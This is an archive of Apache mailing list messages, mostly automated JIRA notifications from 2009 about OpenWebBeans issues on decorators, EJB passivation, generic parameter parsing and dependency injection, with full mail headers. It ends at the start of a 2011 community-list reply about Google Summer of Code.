by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Sun Aug 30 14:57:54 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 91705 invoked from network); 30 Aug 2009 14:57:54 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 30 Aug 2009 14:57:54 -0000 Received: (qmail 14255 invoked by uid 500); 30 Aug 2009 14:57:54 -0000 Delivered-To: [email protected] Received: (qmail 14229 invoked by uid 500); 30 Aug 2009 14:57:54 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 14219 invoked by uid 99); 30 Aug 2009 14:57:54 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 30 Aug 2009 14:57:54 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 30 Aug 2009 14:57:53 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id B4DB0234C004 for <[email protected]>; Sun, 30 Aug 2009 07:57:32 -0700 (PDT) Message-ID: <136022182.1251644252725.JavaMail.jira@brutus> Date: Sun, 30 Aug 2009 07:57:32 -0700 (PDT) From: "Gurkan Erdogdu (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Updated: (OWB-116) Update Business Method Definition In-Reply-To: <375182018.1245502927570.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/OWB-116?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Gurkan Erdogdu updated OWB-116: ------------------------------- Fix Version/s: (was: M3) M4 Fixed to M4. > Update Business Method Definition > --------------------------------- > > Key: OWB-116 > URL: https://issues.apache.org/jira/browse/OWB-116 > Project: OpenWebBeans > Issue Type: Task > Components: Lifecycle > Affects Versions: M2 > Reporter: Gurkan Erdogdu > Assignee: Gurkan Erdogdu > Fix For: M4 > > > See section, 7.2. Decorator and Interceotor method calls are not activate interceptors and decorators. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Sun Aug 30 14:57:55 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 91709 invoked from network); 30 Aug 2009 14:57:54 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 30 Aug 2009 14:57:54 -0000 Received: (qmail 14311 invoked by uid 500); 30 Aug 2009 14:57:54 -0000 Delivered-To: [email protected] Received: (qmail 14278 invoked by uid 500); 30 Aug 2009 14:57:54 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 14268 invoked by uid 99); 30 Aug 2009 14:57:54 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 30 Aug 2009 14:57:54 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 30 Aug 2009 14:57:53 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 29FB1234C051 for <[email protected]>; Sun, 30 Aug 2009 07:57:33 -0700 (PDT) Message-ID: <281138446.1251644253170.JavaMail.jira@brutus> Date: Sun, 30 Aug 2009 07:57:33 -0700 (PDT) From: "Gurkan Erdogdu (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Updated: (OWB-118) Supports Decorators for Other Delegate Injections In-Reply-To: <2011282042.1245503167510.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/OWB-118?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Gurkan Erdogdu updated OWB-118: ------------------------------- Fix Version/s: (was: M3) M4 Fixed to M4. > Supports Decorators for Other Delegate Injections > ------------------------------------------------- > > Key: OWB-118 > URL: https://issues.apache.org/jira/browse/OWB-118 > Project: OpenWebBeans > Issue Type: Improvement > Components: Interceptor and Decorators > Affects Versions: M2 > Reporter: Gurkan Erdogdu > Assignee: Gurkan Erdogdu > Fix For: M4 > > > The delegate injection point must be an injected field, initializer method parameter or bean constructor method parameter. > If an injection point that is not an injected field, initializer method parameter or bean constructor method parameter is an- > notated @Decorates, the container automatically detects the problem and treats it as a definition error, as defined in Sec- > tion 12.4, "Problems detected automatically by the container". -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Sun Aug 30 15:11:56 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 93203 invoked from network); 30 Aug 2009 15:11:56 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 30 Aug 2009 15:11:56 -0000 Received: (qmail 20684 invoked by uid 500); 30 Aug 2009 15:11:56 -0000 Delivered-To: [email protected] Received: (qmail 20653 invoked by uid 500); 30 Aug 2009 15:11:56 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 20643 invoked by uid 99); 30 Aug 2009 15:11:56 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 30 Aug 2009 15:11:56 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 30 Aug 2009 15:11:53 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id F134D234C004 for <[email protected]>; Sun, 30 Aug 2009 08:11:32 -0700 (PDT) Message-ID: <30613085.1251645092973.JavaMail.jira@brutus> Date: Sun, 30 Aug 2009 08:11:32 -0700 (PDT) From: "Gurkan Erdogdu (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Closed: (OWB-127) @Stateful EJBs have to be handled as being passivation capable In-Reply-To: <1891797531.1249668914810.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/OWB-127?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Gurkan Erdogdu closed OWB-127. ------------------------------ Resolution: Fixed Fix Version/s: M4 > @Stateful EJBs have to be handled as being passivation capable > -------------------------------------------------------------- > > Key: OWB-127 > URL: https://issues.apache.org/jira/browse/OWB-127 > Project: OpenWebBeans > Issue Type: Bug > Reporter: Mark Struberg > Assignee: Gurkan Erdogdu > Fix For: M4 > > > Currently the container complains about @Stateful session beans do not have the Interface Serializable. > This check must not be performed for stateful session beans, since they are per se passivation capable. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Sun Aug 30 15:13:54 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 93557 invoked from network); 30 Aug 2009 15:13:54 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 30 Aug 2009 15:13:54 -0000 Received: (qmail 21002 invoked by uid 500); 30 Aug 2009 15:13:54 -0000 Delivered-To: [email protected] Received: (qmail 20984 invoked by uid 500); 30 Aug 2009 15:13:54 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 20974 invoked by uid 99); 30 Aug 2009 15:13:54 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 30 Aug 2009 15:13:54 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 30 Aug 2009 15:13:53 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id B4801234C004 for <[email protected]>; Sun, 30 Aug 2009 08:13:32 -0700 (PDT) Message-ID: <1469225224.1251645212725.JavaMail.jira@brutus> Date: Sun, 30 Aug 2009 08:13:32 -0700 (PDT) From: "Gurkan Erdogdu (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Closed: (OWB-128) OWB crashes while parsing methods with generic parameters In-Reply-To: <747343099.1249852454778.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/OWB-128?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Gurkan Erdogdu closed OWB-128. ------------------------------ Resolution: Fixed Fix Version/s: M4 > OWB crashes while parsing methods with generic parameters > --------------------------------------------------------- > > Key: OWB-128 > URL: https://issues.apache.org/jira/browse/OWB-128 > Project: OpenWebBeans > Issue Type: Bug > Reporter: Mark Struberg > Assignee: Mark Struberg > Fix For: M4 > > > currently > ClassUtil#getClazz returns null for a generic TypeVariable > {noformat} > public class MyClass<T extends MyOtherClass> { > public void myFn(T myParam){ > } > } > {noformat} > In this example myParam is a generic TypeVariable which will be erased in the b-code of the class file to whatever maximum upper bound has been defined. > We either have to handle the compiled upper bound correctly or handle the return of a null value without crashing. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Sun Aug 30 15:13:57 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 93569 invoked from network); 30 Aug 2009 15:13:56 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 30 Aug 2009 15:13:56 -0000 Received: (qmail 21073 invoked by uid 500); 30 Aug 2009 15:13:56 -0000 Delivered-To: [email protected] Received: (qmail 21039 invoked by uid 500); 30 Aug 2009 15:13:56 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 21029 invoked by uid 99); 30 Aug 2009 15:13:56 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 30 Aug 2009 15:13:56 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 30 Aug 2009 15:13:54 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id C8770234C051 for <[email protected]>; Sun, 30 Aug 2009 08:13:32 -0700 (PDT) Message-ID: <1745602118.1251645212820.JavaMail.jira@brutus> Date: Sun, 30 Aug 2009 08:13:32 -0700 (PDT) From: "Gurkan Erdogdu (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Closed: (OWB-129) OWB crashes on creating disposer method In-Reply-To: <1214247913.1249858814806.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/OWB-129?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Gurkan Erdogdu closed OWB-129. ------------------------------ Resolution: Fixed Fix Version/s: M4 > OWB crashes on creating disposer method > --------------------------------------- > > Key: OWB-129 > URL: https://issues.apache.org/jira/browse/OWB-129 > Project: OpenWebBeans > Issue Type: Bug > Reporter: Mark Struberg > Assignee: Gurkan Erdogdu > Fix For: M4 > > > DefinitionUtil#createDisposalMethodsWithRealizations tries to resolve the producer method for the current disposal function. > This doesn't work if the @Produces and @Disposal are defined inside the same bean, cause the producerMethods will only be registered afterwards. > Set<Bean<?>> set = InjectionResolver.getInstance().implResolveByType(type, annot); > returns an empty Set in this case. > I think we may safely continue in this case, because the disposal method seems to be detected nontheless it seems. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Sun Aug 30 15:15:57 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 93691 invoked from network); 30 Aug 2009 15:15:57 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 30 Aug 2009 15:15:57 -0000 Received: (qmail 22278 invoked by uid 500); 30 Aug 2009 15:15:57 -0000 Delivered-To: [email protected] Received: (qmail 22245 invoked by uid 500); 30 Aug 2009 15:15:57 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 22233 invoked by uid 99); 30 Aug 2009 15:15:57 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 30 Aug 2009 15:15:57 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 30 Aug 2009 15:15:55 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 5F02B234C044 for <[email protected]>; Sun, 30 Aug 2009 08:15:35 -0700 (PDT) Message-ID: <678681904.1251645335388.JavaMail.jira@brutus> Date: Sun, 30 Aug 2009 08:15:35 -0700 (PDT) From: "Gurkan Erdogdu (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Closed: (OWB-5) EJB Web Beans MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/OWB-5?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Gurkan Erdogdu closed OWB-5. ---------------------------- Resolution: Fixed Fix Version/s: (was: M4) M3 > EJB Web Beans > ------------- > > Key: OWB-5 > URL: https://issues.apache.org/jira/browse/OWB-5 > Project: OpenWebBeans > Issue Type: Task > Components: Enterprise Web Beans > Reporter: Gurkan Erdogdu > Fix For: M3 > > > Implement EJB related Web Beans components. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Sun Aug 30 15:17:56 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 93906 invoked from network); 30 Aug 2009 15:17:56 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 30 Aug 2009 15:17:56 -0000 Received: (qmail 23272 invoked by uid 500); 30 Aug 2009 15:17:56 -0000 Delivered-To: [email protected] Received: (qmail 23253 invoked by uid 500); 30 Aug 2009 15:17:56 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 23243 invoked by uid 99); 30 Aug 2009 15:17:56 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 30 Aug 2009 15:17:56 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 30 Aug 2009 15:17:53 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id C0A12234C044 for <[email protected]>; Sun, 30 Aug 2009 08:17:32 -0700 (PDT) Message-ID: <1943097439.1251645452788.JavaMail.jira@brutus> Date: Sun, 30 Aug 2009 08:17:32 -0700 (PDT) From: "Gurkan Erdogdu (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Updated: (OWB-5) EJB Web Beans MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/OWB-5?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Gurkan Erdogdu updated OWB-5: ----------------------------- Issue Type: New Feature (was: Task) > EJB Web Beans > ------------- > > Key: OWB-5 > URL: https://issues.apache.org/jira/browse/OWB-5 > Project: OpenWebBeans > Issue Type: New Feature > Components: Enterprise Web Beans > Reporter: Gurkan Erdogdu > Fix For: M3 > > > Implement EJB related Web Beans components. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Sun Aug 30 15:19:55 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 94008 invoked from network); 30 Aug 2009 15:19:55 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 30 Aug 2009 15:19:55 -0000 Received: (qmail 23382 invoked by uid 500); 30 Aug 2009 15:19:55 -0000 Delivered-To: [email protected] Received: (qmail 23349 invoked by uid 500); 30 Aug 2009 15:19:55 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 23339 invoked by uid 99); 30 Aug 2009 15:19:55 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 30 Aug 2009 15:19:55 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 30 Aug 2009 15:19:53 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 3C33A234C051 for <[email protected]>; Sun, 30 Aug 2009 08:19:33 -0700 (PDT) Message-ID: <1935662082.1251645573245.JavaMail.jira@brutus> Date: Sun, 30 Aug 2009 08:19:33 -0700 (PDT) From: "Gurkan Erdogdu (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Resolved: (OWB-43) Constructor Parameter Injection For primitive/wrappers In-Reply-To: <102404908.1232176439552.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/OWB-43?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Gurkan Erdogdu resolved OWB-43. ------------------------------- Resolution: Invalid XML is Removed > Constructor Parameter Injection For primitive/wrappers > ------------------------------------------------------ > > Key: OWB-43 > URL: https://issues.apache.org/jira/browse/OWB-43 > Project: OpenWebBeans > Issue Type: New Feature > Components: New Features > Reporter: Gurkan Erdogdu > Assignee: Gurkan Erdogdu > Fix For: M3 > > > Constructor Parameter Injection For primitive/wrappers via XML and custom annotation. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Sun Aug 30 15:19:57 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 94012 invoked from network); 30 Aug 2009 15:19:57 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 30 Aug 2009 15:19:57 -0000 Received: (qmail 23436 invoked by uid 500); 30 Aug 2009 15:19:57 -0000 Delivered-To: [email protected] Received: (qmail 23401 invoked by uid 500); 30 Aug 2009 15:19:56 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 23390 invoked by uid 99); 30 Aug 2009 15:19:56 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 30 Aug 2009 15:19:56 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 30 Aug 2009 15:19:54 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 2D34E234C004 for <[email protected]>; Sun, 30 Aug 2009 08:19:33 -0700 (PDT) Message-ID: <1320089648.1251645573163.JavaMail.jira@brutus> Date: Sun, 30 Aug 2009 08:19:33 -0700 (PDT) From: "Gurkan Erdogdu (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Reopened: (OWB-43) Constructor Parameter Injection For primitive/wrappers In-Reply-To: <102404908.1232176439552.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/OWB-43?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Gurkan Erdogdu reopened OWB-43: ------------------------------- Assignee: Gurkan Erdogdu > Constructor Parameter Injection For primitive/wrappers > ------------------------------------------------------ > > Key: OWB-43 > URL: https://issues.apache.org/jira/browse/OWB-43 > Project: OpenWebBeans > Issue Type: New Feature > Components: New Features > Reporter: Gurkan Erdogdu > Assignee: Gurkan Erdogdu > Fix For: M3 > > > Constructor Parameter Injection For primitive/wrappers via XML and custom annotation. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Sun Aug 30 15:19:57 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 94016 invoked from network); 30 Aug 2009 15:19:57 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 30 Aug 2009 15:19:57 -0000 Received: (qmail 23484 invoked by uid 500); 30 Aug 2009 15:19:57 -0000 Delivered-To: [email protected] Received: (qmail 23449 invoked by uid 500); 30 Aug 2009 15:19:57 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 23399 invoked by uid 99); 30 Aug 2009 15:19:56 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 30 Aug 2009 15:19:56 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 30 Aug 2009 15:19:54 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 4AA58234C055 for <[email protected]>; Sun, 30 Aug 2009 08:19:33 -0700 (PDT) Message-ID: <576639113.1251645573304.JavaMail.jira@brutus> Date: Sun, 30 Aug 2009 08:19:33 -0700 (PDT) From: "Gurkan Erdogdu (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Closed: (OWB-43) Constructor Parameter Injection For primitive/wrappers In-Reply-To: <102404908.1232176439552.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/OWB-43?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Gurkan Erdogdu closed OWB-43. ----------------------------- > Constructor Parameter Injection For primitive/wrappers > ------------------------------------------------------ > > Key: OWB-43 > URL: https://issues.apache.org/jira/browse/OWB-43 > Project: OpenWebBeans > Issue Type: New Feature > Components: New Features > Reporter: Gurkan Erdogdu > Assignee: Gurkan Erdogdu > Fix For: M3 > > > Constructor Parameter Injection For primitive/wrappers via XML and custom annotation. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online.
From [email protected] Fri Feb 04 16:36:00 2011 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 99199 invoked from network); 4 Feb 2011 16:36:00 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 4 Feb 2011 16:36:00 -0000 Received: (qmail 55704 invoked by uid 500); 4 Feb 2011 16:35:59 -0000 Delivered-To: [email protected] Received: (qmail 55541 invoked by uid 500); 4 Feb 2011 16:35:56 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <dev.community.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 55528 invoked by uid 99); 4 Feb 2011 16:35:54 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 04 Feb 2011 16:35:54 +0000 X-ASF-Spam-Status: No, hits=-1.6 required=5.0 tests=RCVD_IN_DNSWL_MED,SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO e6.ny.us.ibm.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 04 Feb 2011 16:35:45 +0000 Received: from d01dlp02.pok.ibm.com (d01dlp02.pok.ibm.com [161.129.204.104]) by e6.ny.us.ibm.com (8.14.4/8.13.1) with ESMTP id p14GKcTG023288 for <[email protected]>; Fri, 4 Feb 2011 11:21:11 -0500 Received: from d01relay02.pok.ibm.com (d01relay02.pok.ibm.com [161.129.204.104]) by d01dlp02.pok.ibm.com (Postfix) with ESMTP id 253384DE803F for <[email protected]>; Fri, 4 Feb 2011 11:34:44 -0500 (EST) Received: from d03av04.boulder.ibm.com (d03av04.boulder.ibm.com [161.129.204.104]) by d01relay02.pok.ibm.com (8.13.8/8.13.8/NCO v10.0) with ESMTP id p14GZN3N460262 for <[email protected]>; Fri, 4 Feb 2011 11:35:23 -0500 Received: from d03av04.boulder.ibm.com (loopback [161.129.204.104]) by d03av04.boulder.ibm.com (8.14.4/8.13.1/NCO v10.0 AVout) with ESMTP id p14GZM10001353 for <[email protected]>; Fri, 4 Feb 2011 09:35:22 -0700 Received: from [161.129.204.104] (sig-9-48-98-220.mts.ibm.com [161.129.204.104]) by d03av04.boulder.ibm.com (8.14.4/8.13.1/NCO v10.0 AVin) with ESMTP id p14GZKch001262 for <[email protected]>; Fri, 4 Feb 2011 09:35:22 -0700 Message-ID: <[email protected]> Date: Fri, 04 Feb 2011 08:35:23 -0800 From: Kathey Marsden <[email protected]> User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:161.129.204.104) Gecko/20101207 Thunderbird/3.1.7 MIME-Version: 1.0 To: [email protected] Subject: Re: GSoC is go... References: <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Content-Scanned: Fidelis XPS MAILER X-Virus-Checked: Checked by ClamAV on apache.org On 1/24/2011 